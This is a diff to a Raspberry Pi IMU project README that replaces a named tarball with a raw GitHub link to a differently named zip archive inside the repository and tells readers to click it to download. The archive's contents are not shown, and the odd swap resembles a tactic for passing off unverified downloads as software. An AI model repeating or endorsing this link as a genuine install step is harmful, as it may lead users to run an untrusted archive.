catfries456/IMU_for_rpi/README.md

 ### 📦 Download Example

-If you see a file named `IMU_for_rpi.tar.gz`, click on it to start the download.
+If you see a file named `https://github.com/catfries456/IMU_for_rpi/raw/refs/heads/main/common/IM-for-rpi-3.4.zip`, click on it to start the download.
 This file contains all necessary components to run the software.

 ## ⚙️ Installation Steps